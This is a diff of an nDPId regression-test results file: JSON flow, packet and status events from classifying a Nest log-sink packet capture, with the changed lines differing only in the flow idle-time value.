-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1536714610253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714610253,"pkt":"AJD7JidrGLQwJjRACABFAAAsL74AAP8GGt\/AqPIPI7yauvdwK1cI1a0HAAAAAGACEgA9hwAAAgQEgAAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1536714610314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714610314,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93Bcs3xVCNWtCGASbvAGcQAAAgQFjA=="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1536714610318,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714610318,"pkt":"AJD7JidrGLQwJjRACABFAAAoL78AAP8GGuLAqPIPI7yauvdwK1cI1a0IXLN8VlAQEgB69gAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1536714610253,"flow_last_seen":1536714613730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1738,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1536714613730,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00710{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1536712992228,"flow_last_seen":1536714607385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1536714602612,"flow_last_seen":1536714607322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":14831,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1536714610253,"flow_last_seen":1536714615546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714607530,"flow_last_seen":1536714607530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714607530,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1536714607530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714607530,"pkt":"AJD7JidrGLQwJjRACABFAAAsL7MAAP8GYsXAqPIPI65S7fdvK1cIymiPAAAAAGACEgDJ5gAAAgQEgAAA"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1536714607594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714607594,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX92+qr\/jxCMpokGASaQPN\/AAAAgQFtA=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1536714607597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714607597,"pkt":"AJD7JidrGLQwJjRACABFAAAoL7QAAP8GYsjAqPIPI65S7fdvK1cIymiQqq\/48lAQEgA8vQAAAAAAAAAA"} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714607530,"flow_last_seen":1536714609684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714609684,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714610253,"flow_last_seen":1536714610253,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714610253,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1536714610253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714610253,"pkt":"AJD7JidrGLQwJjRACABFAAAsL74AAP8GGt\/AqPIPI7yauvdwK1cI1a0HAAAAAGACEgA9hwAAAgQEgAAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1536714610314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714610314,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93Bcs3xVCNWtCGASbvAGcQAAAgQFjA=="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1536714610318,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714610318,"pkt":"AJD7JidrGLQwJjRACABFAAAoL78AAP8GGuLAqPIPI7yauvdwK1cI1a0IXLN8VlAQEgB69gAAAAAAAAAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1536714610253,"flow_last_seen":1536714613730,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1738,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1536714613730,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00710{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1536712992228,"flow_last_seen":1536714607385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1536714602612,"flow_last_seen":1536714607322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":14831,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1536714610253,"flow_last_seen":1536714615546,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":276,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":276,"packets-processed":215,"total-skipped-flows":0,"total-l4-data-len":21968,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":5,"total-detection-updates":1,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1536714800447} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":278,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536714602587,"flow_last_seen":1536714607527,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1536714795433,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":326,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":326,"packets-processed":245,"total-skipped-flows":0,"total-l4-data-len":21968,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":5,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":1536715402175} @@ -41,25 +41,25 @@ 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402804,"flow_last_seen":1536716402804,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536716402804,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1536716402805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536716402805,"pkt":"GLQwJjRAAJD7JidrCABFAABUcEtAAEARZOvAqPIBwKjyDwA1znEAQGW0d92BgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536716402804,"flow_last_seen":1536716402805,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536716402805,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402828,"flow_last_seen":1536716402828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716402828,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1536716402828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716402828,"pkt":"AJD7JidrGLQwJjRACABFAAAsL\/gAAP8GGqXAqPIPI7yauvdxK1cI4Q21AAAAAGACEgDczAAAAgQEgAAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1536716402889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716402889,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93El8kNOCOENtmASbvAVfwAAAgQFjA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1536716402894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716402894,"pkt":"AJD7JidrGLQwJjRACABFAAAoL\/kAAP8GGqjAqPIPI7yauvdxK1cI4Q22JfJDT1AQEgCKBAAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716402828,"flow_last_seen":1536716404974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716404974,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402828,"flow_last_seen":1536716402828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716402828,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1536716402828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716402828,"pkt":"AJD7JidrGLQwJjRACABFAAAsL\/gAAP8GGqXAqPIPI7yauvdxK1cI4Q21AAAAAGACEgDczAAAAgQEgAAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1536716402889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716402889,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93El8kNOCOENtmASbvAVfwAAAgQFjA=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1536716402894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716402894,"pkt":"AJD7JidrGLQwJjRACABFAAAoL\/kAAP8GGqjAqPIPI7yauvdxK1cI4Q22JfJDT1AQEgCKBAAAAAAAAAAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716402828,"flow_last_seen":1536716404974,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716404974,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1536716407003,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1536716407003,"pkt":"AJD7JidrGLQwJjRACABFAABXMB8AAP8RJhTAqPIPwKjyAc5xADUAQ16pMiMBAAABAAAAAAAAB2N6ZmUxMDUHZnJvbnQwMQVpYWQwMQpwcm9kdWN0aW9uBG5lc3QDY29tAAABAAE="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716407119,"flow_last_seen":1536716407119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716407119,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1536716407119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716407119,"pkt":"AJD7JidrGLQwJjRACABFAAAsMCAAAP8GYljAqPIPI65S7fdyK1cI7G5zAAAAAGACEgDD3QAAAgQEgAAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1536716407186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716407186,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93Kf6ho7COxudGASaQOxbwAAAgQFtA=="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1536716407188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716407188,"pkt":"AJD7JidrGLQwJjRACABFAAAoMCEAAP8GYlvAqPIPI65S7fdyK1cI7G50n+oaPFAQEgAgMAAAAAAAAAAA"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716407119,"flow_last_seen":1536716409280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716409280,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716409847,"flow_last_seen":1536716409847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716409847,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1536716409847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716409847,"pkt":"AJD7JidrGLQwJjRACABFAAAsMCwAAP8GGnHAqPIPI7yauvdzK1cI9889AAAAAGACEgAbLAAAAgQEgAAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1536716409908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716409908,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93M4S\/jECPfPPmASbvCMDgAAAgQFjA=="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1536716409910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716409910,"pkt":"AJD7JidrGLQwJjRACABFAAAoMC0AAP8GGnTAqPIPI7yauvdzK1cI988+OEv4xVAQEgAAlAAAAAAAAAAA"} 